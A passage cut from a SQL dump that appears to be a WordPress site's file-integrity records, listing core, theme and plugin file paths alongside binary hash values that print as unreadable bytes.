۝e���&�','',0,'?'),('�r��{�\Zk��\"��k','wp-admin/css/site-health-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E/c���&=�k\r^��m�','\"k�h&8h�%�*�\\�2@b��$։�da���','',0,'?'),('�xjP����!c�x','wp-admin/plugin-install.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n�*���#��_��ҳZ�','�����f��uG#����\'��_ً�:�F�A','',0,'?'),('ʂ[	&�?p�bD','wp-content/plugins/wordfence/modules/login-security/css/jquery-ui-timepicker-addon.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�A��MA�@����|�','u��\Z�Ӛ1!�b�� \"�0SBȓ>�rEk�','',0,'?'),('ʇ�\\~D��\nBER','wp-content/plugins/unyson/framework/static/libs/unycon/README.md',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��[}Ts0ԛ�v -�','�0�Q6tf!�ᠡ\"�5(�J��G�»<&�','',0,'?'),('ʒI-)��Tr3}M','wp-content/themes/verbosa/admin/js/admin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Dn.0`w`��ة��\Za','d�(<����F�`���_�1P�E 5��n�','',0,'?'),('ʡsi#j����e��\0��','wp-content/plugins/wordpress-seo/js/dist/select2/i18n/he.js',0,'���@��5bIN2�','���@��5bIN2�','1�S�ipE%bmT乼��tB�U/Em�YΤ�$��','',0,'?'),('ʨ\0e������u�`','wp-content/plugins/unyson/framework/extensions/backups/includes/log/scripts.js',0,'5��BQ�;���dc','5��BQ�;���dc','�i�y:	\rđ;8kG�Gb���\"�1K��o3','',0,'?'),('ʯ��!;2��^x��g','wp-content/themes/hueman/option-tree/assets/images/ot-select.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1�vlR�[�B�y��1��','��`��?�S������K	����ڍ�u��','',0,'?'),('ʵs��	����R>��?','wp-content/themes/twentytwentyone/page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�G:��Ll�}\0!��%','mDTZ��\r�τ(c�zG�ܟKl�@����Kv','',0,'?'),('���W�>�ҟ����[','wp-includes/Requests/Exception/HTTP.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��h���Rlr��','o�E²tQQbo\n����r�Qq��\"�/����','',0,'?'),('��&�����~sXm','wp-content/themes/twentytwenty/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���E�q�$�n�o�','i�HjH�7Ʉ�?��í��:�E�\'����eR�','',0,'?'),('�ύ�PqG:�%pJ','wp-content/plugins/unyson/framework/extensions/builder/includes/sub-includes.php',0,'*(1���Fd�%�\n�/�','*(1���Fd�%�\n�/�','�08�y�.7�]_�UR��9�������K��','',0,'?'),('��jV���c�ЍRf�','wp-content/themes/fabulous-fluid/images/icon-calander2.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�d�������\"','d�k�A|�L��mm�oi�va��VYYq(_$F�','',0,'?'),('�ۨV��<��;�@P','wp-content/plugins/wordpress-seo/inc/options/class-wpseo-option-ms.php',0,'�mܚ߈]�������Y','�mܚ߈]�������Y','��[�:;�Cg�m��f��,�:`b��f)9���','',0,'?'),('���\rm�̰�D��4�','wp-content/themes/verbosa/cryout/js/ajax.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���x���AҸ��^�.','��H-KjS˛4���o�r|�lz�Ȫ��p','',0,'?'),('�܆R(�\'2Whp���G','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/AbstractModel.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@ҏH��C�5̨[\0��','�X��f:�M�t�˃#��sD�4(�NG�F�','',0,'?'),('��	b���8�[����y','wp-includes/js/wp-emoji-release.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�d͢7@$��g�;','F\r�R7��s\"YX^�ȹ�$�y�ss[','',0,'?'),('�㱛��� V9�{��b','wp-content/plugins/wordfence/views/scanner/issue-postBadTitle.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�d�+���l�@�h�','3�i]m���&�	��s֯�I��g�e�ok��/M�','',0,'?'),('����Scsc��/+','wp-content/themes/fabulous-fluid/inc/featured-grid-content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�k�h9,U���d6^','�2l�3DloK�P`A�[u�����xe�͑>�','',0,'?'),('����\Z`A�O��u&�','wp-content/themes/the-minimal/images/quote-icon2.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�1H�?��g�p�{','�@eR�\"���̯{L͘�i}�ߔmq�9a��ĥ','',0,'?'),('��O忯uR��c�[j','wp-includes/sodium_compat/namespaced/Core/HSalsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[cl�r�u�	�Сu^','6p��\'`�+*[AG�4�����^6Ŋ��%�C','',0,'?'),('��9���3p��^�1��','wp-content/plugins/contact-form-7/admin/includes/editor.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m��zxz���X�o��','\'?��e{�;��z.��	�P�z�F�eT�hW','',0,'?'),('��E\0|xJ�����','wp-content/themes/hueman/functions/init-wp-core-filters.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0I\Z,���� \n�l','}�>�I}��:��߀��)�3����TJ�1','',0,'?'),('�ԊOh��K���','wp-content/themes/skt-construction-lite/images/welcomeimage.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�j����\'��|TV��','@VT��վ��XH?�,*\Z�׌�B��D�U','',0,'?'),('�F�5I�QQ�	d|a��','wp-content/plugins/contact-form-7-designer/includes/js/cf7-styles.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Vt\r�=��]Y/8O6�','�v]w��Z�<�9�Be��2.Cf�14\0݃��','',0,'?'),('����\nK�9�}�\'I','wp-content/themes/point/header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ġ�/qg��>���.','�΃�Z�W��c���)= ��!�/w���','',0,'?'),('�s��z��D�<�R	�>','wp-content/plugins/unyson/framework/includes/option-types/upload/static/js/images-only.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[Cf�*�[\Z�3�u7','��{	:�ʡ����Zޏx�]��P��U�]','',0,'?'),('���7�w �`O\\)��','wp-content/themes/nirvana/content/content-chat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f�u�F\0;U(��}5v','� �v{_������\Z�6<NL[7;g�RI�X�','',0,'?'),('�!��#��I|���F�','wp-includes/js/tinymce/plugins/directionality/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&�\"�X	& )��=ʀ$','�&�[�@��5��(��cv��L��YI6�B;)-','',0,'?'),('�#q�KhCk�\0\r)S%�','wp-content/plugins/all-in-one-wp-security-and-firewall/lib/whois/whois.org.za.php',0,'��pn�\n����z?�','��pn�\n����z?�','��QĻ���˦B���%�0���&���\\��','',0,'?'),('�\'I?�1�~4�M��','wp-content/plugins/all-in-one-wp-migration/constants.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6��=8u֌�����','�o����-O���Red+��$�{�^�r�CU','',0,'?'),('�28c\"�<;���Uv�?�','wp-content/themes/twentyseventeen/assets/js/jquery.scrollTo.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�d��c�	�@�y','p��0���O��	����9��@5�E~���U�','',0,'?'),('�5V�x�,$�>7d�k�','wp-includes/sodium_compat/namespaced/Core/X25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ڸb��9����M','�F�/\'���M%�9�}@��fW�>��S*�m','',0,'?'),('�6�<��C�﮿�V:(r','wp-includes/js/tinymce/plugins/wpeditimage/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�be& W����Ř�','Iu{W�m�bk_�����.�cx\rh+K�','',0,'?'),('�I�hX7y�����4','wp-content/plugins/unyson/framework/includes/option-types/date-picker/static/js/locales/bootstrap-datepicker.pl.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n]HG\n�4��}��l','5��H��ތB���_R���ϼ�q��]��q','',0,'?'),('�U+ǜ�j�j�	��','wp-content/plugins/spam-captcha/core/admin_table.class.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s�fύ��=�T��L','�Z,�ڼ�]��bq���n��\"���o�-\\','',0,'?'),('�U<�?Y,����ػ(','wp-admin/js/svg-painter.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�T��Z��������','���ΜɉW=kDdx���_g+�wi�s|','',0,'?'),('�U��}�B��	Js��','wp-includes/class-wp-object-cache.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�rܮ�U ��Lj0z','S����9M���a�\0�HHóyI��b�M�{','',0,'?'),('�k�~eXT�\\�L�X�','wp-content/plugins/spam-captcha/css/css_admin.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ُ\0��	��B~','��B�����șo�$\'�A�d��L���xR�U','',0,'?'),('�y�6�6l�M�C�','wp-content/plugins/wordfence/views/waf/firewall-status.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�pc�\r���	�\"��','~u~01���8c�8�ɹ��F��E��1=���','',0,'?'),('�|G��$���k���','wp-includes/js/dist/vendor/wp-polyfill-url.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�>d�KP\'IC��3��8','�k��z��:�_sDp�xe%J�	���ST�_','',0,'?'),('�}Ua&gl��i�)���!','wp-includes/rest-api/endpoints/class-wp-rest-post-statuses-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5�G��blN���v�<�\r','�nW�#g!\\��>>�,��z��g��Ck��g','',0,'?'),('ˍ�G䯀oe���o�','wp-includes/js/shortcode.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@�������P}�SΊ','yae�aK��R�\0%��xy��u�y�↢','',0,'?'),('˓�j�q	_�G�P�\"','wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/calendar/class-fw-shortcode-calendar.php',0,'�,�Nk �5񍍽!�.�','�,�Nk �5񍍽!�.�','K�C\n�]�Y�\n�Y�{&��&��u¼ƛ\r/&','',0,'?'),('ˤԐ�{%k�#�f�','wp-includes/js/mediaelement/wp-playlist.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����3|G^�cKT\"�','\'�e\"ʌ�_(n��f��ww�\Z�N�2�+ ','',0,'?'),('˦3`SU19��JD���','wp-content/themes/clean-magazine/inc/widgets/instagram.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3�����\\̏IM4��','��c\\B߅�&A$\Z�\n��i%��lu�\'-�','',0,'?'),('˦�&�(?�\"����','wp-content/themes/vega/assets/js/jquery.smartmenus.bootstrap.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<�0��4lq�i�OƬ�','KpR�j����	���g��5 !��``���c','',0,'?'),('�ǝ��Q��_y�d��+�','wp-includes/sodium_compat/src/Core/XChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X��U iU0�ll9�c','��_�v$�U7_�*\r?�+�^��≾�Ā','',0,'?'),('���N��\0��ܹ�t','wp-includes/js/jquery/ui/spinner.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�8��TXi�M�Y�','�>�qJط���0� �\'���R\'n�7s�b3|','',0,'?'),('��d�I�Kƹ�v\Z�0�','wp-content/plugins/wordpress-seo/admin/views/user-profile.php',0,'������ư��9�i��','������ư��9�i��','P3Е=����U:�T��ÿ���Y��>WKWw�','',0,'?'),('��v�E,�-O�{���','wp-includes/link-template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���Ȭ|����_zIe3�','7ߔ�����ys&a�{��,���E�V`||','',0,'?'),('��oV�\'����sVj�','wp-content/themes/travelify/library/font/Genericons.eot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','→��(��7k�j','ɞ����1��X��*��*��y��h���s','',0,'?'),('����{�@�q��mu','wp-content/themes/twentytwentyone/template-parts/header/entry-header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T��E�50Q��D=�l�','�2&���.����(SG�l���^�N��C&/ρ�','',0,'?'),('�!�LT�3��i��x�','wp-admin/update-core.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��p�]ړ�i����','G|��V��2��`�Nl j|����_����3','',0,'?'),('�&lt0��a��k�f','wp-content/themes/nirvana/images/socials/MySpace.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���U��҇12mX\0��','w7�~�q�i�_�|#vUZH�����4�mS\rT�','',0,'?'),('�;��Pa�?6S?�J�1','wp-content/themes/travelify/languages/bg_BG.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J\n�\"�k�m��o��>','Qq&�S��)�j=PBJ�c���q2�A~W�','',0,'?'),('�I=�Y_s7y4���26+','wp-content/themes/hueman/functions/czr/tmpl/modules/social-module-tmpl.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h{/pA$Y�d� �=�','\r��$�+�_.9rW���l��2[Ox��̩O�','',0,'?'),('�M�Tq&[?��>칊�\n','wp-admin/css/colors/ectoplasm/colors.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�q�9+�\"��+��','B��m��N��h�����stN��jAS4X\0$','',0,'?'),('�M����z�ŭY���','wp-content/plugins/wordfence/modules/login-security/img/ui-icons_444444_256x240.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�G�J��u;Q�Z6��','����\\MU��KhQ�w�C��i�V���J\'','',0,'?'),('�V/��f�o\n��a+��','wp-content/themes/illdy/layout/css/bootstrap-theme.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*����y�>���ƥu/','�:�G)[ ��BQ�FO~��\0ʌ+�����\n��H','',0,'?'),('�Vd	]�=M[[ٿ���','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-list-permanent-blocked-ip.php',0,'�H��{i��_�����','�H��{i��_�����','�F�9�N���!�n�꣺�,���A�@��U�-,','',0,'?'),('�V�ڮ����M��jӁ','wp-includes/js/plupload/license.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u&\n�TI�z����+�','��\0v1��s�N�>cID٦����I�0�-','',0,'?'),('�]���R��Q��[�R��','wp-content/themes/wen-business/footer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�<>��\ru�5�K<','���d�;�ɴ�`�a#����o�p2����/','',0,'?'),('�n�]�V�[td~���','wp-content/themes/wen-business/content-search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��.Ã?�\\߅S)�','ڸ\"3��W�;�p%�ַ�2~��ٝoU�LI','',0,'?'),('�x����:ϛ�C��','wp-content/plugins/unyson/framework/extensions/builder/static.php',0,'ی��~��_��y��^','ی��~��_��y��^','O���p�\"vb�j\nNba�E����ܬ�=\Z#$F�W','',0,'?'),('���i��n�j/�r��','wp-includes/js/dist/i18n.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5�\0�QxZ�����J\n_','�A(G���Y�Ik��K��\\i-ĝ�;�8','',0,'?'),('́ԑ�A�Ha]�\':�','wp-includes/blocks/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','dC,���D�=@�_�','��\n*��Ϋ���s�,�x ���-u�?�','',0,'?'),('̈Wq�T {xH����','wp-content/themes/sg-window/page-templates/no-content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\'OmԽGU�#�k���','���Ƣܤ4���#މ�P�o{%}\'���D�Ɯ','',0,'?'),('̋��q�B3a�Y��-�','wp-content/plugins/wordfence/views/dashboard/options-group-email-summary.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\0`\'}�(���b���A#','c,�Bp�2�8���0j��7}hp-��宆','',0,'?'),('̎9�,Q�\n�B�}��','wp-content/plugins/all-in-one-wp-security-and-firewall/lib/whois/whois.fm.php',0,'�<�o�\n��bk�~�%�','�<�o�\n��bk�~�%�','W`Ƭ�\Z�J�ii��Zj���t�\'���B','',0,'?'),('̙~�Ȍî+���byȁ','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/SipHash.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{�숊z��;5!��','�D�\Z���L�ޠΔa��]n�\n���L&�\n','',0,'?'),('̥a�#�PÚ���','wp-content/plugins/unyson/framework/core/components/extensions/class-fw-extension-default.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���#�g߼/�ן��]','1N��?�`��݌��W�?4.�B���5','',0,'?'),('̮��m~O�^H�1��','wp-content/themes/panoramic/single.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�.�@R�q�@7l�1','$�P��v�Sᝋ��%���Я�I�MDw��5s','',0,'?'),('̶�Q\r����)$��&�','wp-content/themes/fabulous-fluid/js/custom.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Tp{3E�_��Κ','�6��T�J��5��1��Ր\Z�#>EH(\n�����','',0,'?'),('̽� ���X�$oB�','wp-content/plugins/akismet/_inc/akismet.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z>(9��\"r�4\"��','v&�`���^�؂i��Af��Eg|!$~�Iu�2�','',0,'?'),('�\r��dp\r��O��','wp-content/plugins/all-in-one-wp-migration/lib/view/updater/modal.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#\0N\rf���G�S\n�C','h��(n����)��o��^W���96�*���','',0,'?'),('�Ê5ff�;,G!\'��\'-','wp-admin/css/colors/ocean/colors.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h� �i�+9����^�','l	�m\'�p��Su/����*yW�V���W&','',0,'?'),('�����\";+�\rxu���w','wp-includes/js/mediaelement/renderers/vimeo.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�?�~s���i6G�/','��{����w��-\r����zF�v_��\\wf���','',0,'?'),('�NJ�E�v�c,�صyS^','wp-includes/images/crystal/license.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�]�Lc�iG�fQ�\r��','v��pm��c�6�Y~\",!V��EXl�l�\"z�','',0,'?'),('�̧\'�\\�z����co','wp-content/themes/sg-window/inc/customize-info.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���W������K��P','W3�H���,8�k�\r%?]���Z�Jx�','',0,'?'),('�ͧS·*��mYkim(','wp-content/themes/mh-magazine-lite/languages/fa_IR.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0>������+ֱ��®','E��� �0����o?�V^u)���fv]�9W�d','',0,'?'),('��3d@w@1&�cw �','wp-content/themes/sg-window/img/icons/myspace.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�-�E�a�kf\Z���Η','��Ga�����\Zr�!�<az��Gfx�dI�','',0,'?'),('��J�{�<���M�','wp-content/themes/vega/assets/css/bootstrap.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']SW�7��:[�Ү�B','z��ܓ=�gRȯu�*2�����oO:i`\n�̀X','',0,'?'),('��F�xq�߅���;��','wp-content/themes/mh-magazine-lite/languages/fr_FR.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�[Q\rI��ur-��*(�',' ��]2��!���`wl��\0I�;�t�','',0,'?'),('�~Q\\�E��k��{Q','wp-content/plugins/spam-captcha/core/lang/SL_framework-pt_BR.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\RVQ�)���P��A#','�o����ѻ���eZ,���DW�n����­','',0,'?'),('�\0=l�\'��A��0h�','wp-content/plugins/unyson/framework/includes/option-types/image-picker/class-fw-option-type-image-picker.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\r�s\r^�+���:R0','t��0�xR�h�O\'({���K5�I���','',0,'?'),('����p�j֛`��w','wp-admin/css/customize-controls-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��l5�XL����','�o����x�z�e�u.�g��(�ެZC�3��5\r','',0,'?'),('�hUM�\0�e\\�k','wp-content/themes/barletta/searchform.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ɯa��P4z]�\"`F0�','���+WTc��*��m�\n��5Ͽcz��','',0,'?'),('�n	�}V-����I�','wp-content/themes/twentytwenty/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i�P�2��%F��,�-','�ʄ�%��Ũ�k$ Ȏ������g?��Ҧ�','',0,'?'),('�d���lP�O�I�','wp-admin/network.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�DlR����=���@n','ٔ�fİ��	�qRK/�h��XٱVJH&k�HPB','',0,'?'),('�)����\0�e�_�5=�','wp-content/plugins/wordfence/lib/diffResult.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g�Q ����f��7�F','�Ҏ��E����؊>^!j��\0O���ca��^��','',0,'?'),('�4g�43�!�B\\ꟑ�','wp-content/plugins/wordpress-seo/admin/metabox/class-metabox-analysis-readability.php',0,'�ʁg#׺s��ζF','�ʁg#׺s��ζF','�aA[C3U�_=$�?�U��b�a����\n2','',0,'?'),('�8�����W��{r��','wp-content/plugins/unyson/framework/includes/option-types/addable-popup/views/view.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d �:�D�cM��s;J','���4�+�;q�_d�K��G��je���I>','',0,'?'),('�K=�X�a:�\'5�','wp-includes/sodium_compat/src/Crypto.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�-p����\0E�cb�c�','\"�̘�L���!�{rDnPz^��X�j��Lk','',0,'?'),('�^&��`R�y����J','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/autoload.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���}n�3;g)���','\nj�^�����C�(��UU�i\'9�O','',0,'?'),('�h4N\Z6�U.��U��','wp-content/themes/illdy/layout/images/blog/blog-recent-post-2.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','xB�`�ݷL�ꭄ\n','�҈:�_��..z�^�u,hg��O��|E��','',0,'?'),('�j�%�b�1q��U�I�#','wp-content/plugins/dw-social-share/assets/fonts/fontawesome-webfont.eot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2@N�*�ؿ�B\'�F','���č��oz�0u�����G;B.#CCV��','',0,'?'),('�m��L0N\"�T~�b�','wp-includes/theme-compat/footer-embed.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Z����.�+�j','�i��D�AJ�ψ;v,gc�%���	^#','',0,'?'),('�w�9=�_\"h%��v','wp-admin/css/install-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n�JGd]�i�!\Z����','�\0_�jW��?<�!�w����4q��t����N��','',0,'?'),('͋�A-�^p��c','wp-content/themes/illdy/layout/js/owl-carousel/owl-carousel.min.js.map',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�/�I7�����(�|�','���ݽ��Sv�T�=��\"���\n�o�IO�6�','',0,'?'),('͌�\"��;K��qf','wp-content/themes/panoramic/library/images/loader.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����o������','����/���	9�`c졠�’םU���A�','',0,'?'),('͎3ע�Jyn�ĀM�','wp-content/plugins/wordfence/fonts/fontawesome-webfont.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��nq*��ZF�)2�','�&4\"\rQ�jX�mN\"��?P�o��\\��?���','',0,'?'),('͑�\r���Ұ���{','wp-content/themes/hueman/assets/front/fonts/titillium-light-webfont.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����KC�!{��a�','\"��	�1�NL^t���<�r��V�|v*il&','',0,'?'),('͓�Y�36��l�Y��','wp-includes/js/tinymce/plugins/textcolor/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��v�<h������p�','!�/�[I�+\r��G���� Dխ�7�=�����\'','',0,'?'),('ͩ�~�+��[t��','wp-content/themes/nirvana/page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���1R�=�4}O','��Ʉg0ZU���E#����-�I#N3(���\'n','',0,'?'),('ͪu�owsFC�G[c��','wp-includes/rest-api/fields/class-wp-rest-meta-fields.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�eB��I.�{�G۰^','>W�B�����d�B��W�B�#+dyh$��%o','',0,'?'),('ͬGG\\0q.��͜��','wp-content/themes/hueman/assets/czr/css/img/green.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�|(w40��\\P~\0�lX�','v\'�\"��U=n�W���Ngv�ne�-�S�.��K�.','',0,'?'),('Ͷ�jʃఱ���-�','wp-content/plugins/wordfence/lib/menu_firewall_blocking_options.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�:د_x��O0�8���X','�[�|�r�;�������Ƹ����l�b���	Q','',0,'?'),('ͽ3��=��O�G�|~�','wp-includes/SimplePie/Credit.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.�6�K>.��L��','r�ٴ��@c�@���{R�CG����d^�>>E\Z','',0,'?'),('��W����.z���','wp-content/plugins/spam-captcha/lang/spam_captcha-az_AZ.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','WD��(\nG7��#','��$��L�k��+����2�.��+ʘ;rU�','',0,'?'),('��y�Uq���hŝ�','wp-content/plugins/wordpress-seo/inc/class-wpseo-rank.php',0,'�mdu�#���f���)s','�mdu�#���f���)s','3���L	��:�ƌC���6�#>,�L-��','',0,'?'),('��3�����F�<��8','wp-includes/js/underscore.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����$b��Z�C','�8A�2�xz��\0<G-�E	��r��쇮?�R�','',0,'?'),('��H�/8�O��F�;�','wp-content/plugins/universal-google-analytics/images/brontobytes.svg',0,'\'H=J�.���@�c��','\'H=J�.���@�c��','�t��2�;x�#I��X^^>=\0��h*.�a','',0,'?'),('��S�>s�U)����H','wp-includes/sodium_compat/src/Core32/Curve25519/Ge/P1p1.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�y$�NX���l��l','[�-���v5<��M\n���+B�u.,�5g','',0,'?'),('��r��\\���ẘJ���','wp-content/plugins/unyson/framework/includes/option-types/datetime-picker/class-fw-option-type-datetime-picker.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�}P�)��8����\'�?','K��iKt��(�X��JE��rbz]��&U�P<�','',0,'?'),('���j(g��~jU#��','wp-admin/includes/class-wp-filesystem-ssh2.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��۞])B�R�W�','grq���#5p:�?���e����+F','',0,'?'),('����w㈞�†�','wp-content/themes/morfeu/assets/sass/bootstrap/bootstrap/mixins/_tab-focus.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-�y~;HU�@߇�','q\\=tD<�ǯ.�t�CDU�i�\'�s�o','',0,'?'),('� ��Mu�)`��>�2','wp-content/themes/twentytwentyone/image.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��곫ö��!��','��)�!H��J�){\"�����Gk�ˠB��q1�','',0,'?'),('�!\0����E+�4 H4','wp-content/themes/panoramic/page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9�{]��Ź����\0�4�','�7��-ܰ���E���C����SLp�P>D','',0,'?'),('�(�*ľ&����Sp�','wp-content/plugins/all-in-one-wp-migration/deprecated.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','IL�3��WK����','#2��{ƳI�M���]�Mk^��!9p�\r���`7','',0,'?'),('�-!�R&rcuyz�7�','wp-content/themes/travelify/languages/pt_PT.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o�:�ݸ�	ͯ��Et��','�u� ��8���[d�j�*ќ^�1�6H�HtJNm','',0,'?'),('�.����AB��e�s','wp-content/themes/wen-business/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l1�\Z0�NX|��JD','y������P����#�����rJS&�G�	\Z','',0,'?'),('�2_��G��h�a\r��','wp-content/themes/travelify/library/panel/images/one-column.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Q�b&e+������%','���\0IJ���W����\r�\0���ByE�','',0,'?'),('�5��p��ئ�١W*','wp-content/themes/panoramic/upgrade/library/js/upgrade.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ZxD5��Qkĝ��B','ɝ�}�u[[��p\Zl���������~�CE�Y','',0,'?'),('�:���f�I�Z�.-�